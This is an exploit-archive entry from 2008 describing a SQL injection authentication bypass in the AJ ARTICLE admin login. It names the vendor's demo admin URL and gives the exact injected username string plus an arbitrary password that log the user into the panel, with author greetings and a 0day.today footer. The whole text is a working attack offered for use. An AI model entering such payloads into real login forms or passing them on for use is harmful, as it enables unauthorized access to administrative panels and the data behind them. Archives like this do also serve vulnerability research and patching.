id: 4012
date: 11/01/2008
title: AJ ARTICLE (SQL Injection) Remote Auth Bypass Vulnerability
author: Hakxer
cves: 

===========================================================
AJ ARTICLE (SQL Injection) Remote Auth Bypass Vulnerability
===========================================================


# Discovered by : Hakxer
# Type Gap : Auth Bypass
# Script : AJ ARTICLE 
# Greetz : Allah , Egyptian x hacker , Br1ght D@rk 
##########################################################################

# [~] First Go to http://www.ajsquare.com/products/demo/admin/index.php
# [~] In username Write : admin ' or ' 1=1
# [~] In Password Any thing : Hakxer
# [~] Click Login ..! you in panel
		

# Proud To be a Muslim #
#_=END=_#



#  0day.today [2023-03-26]  #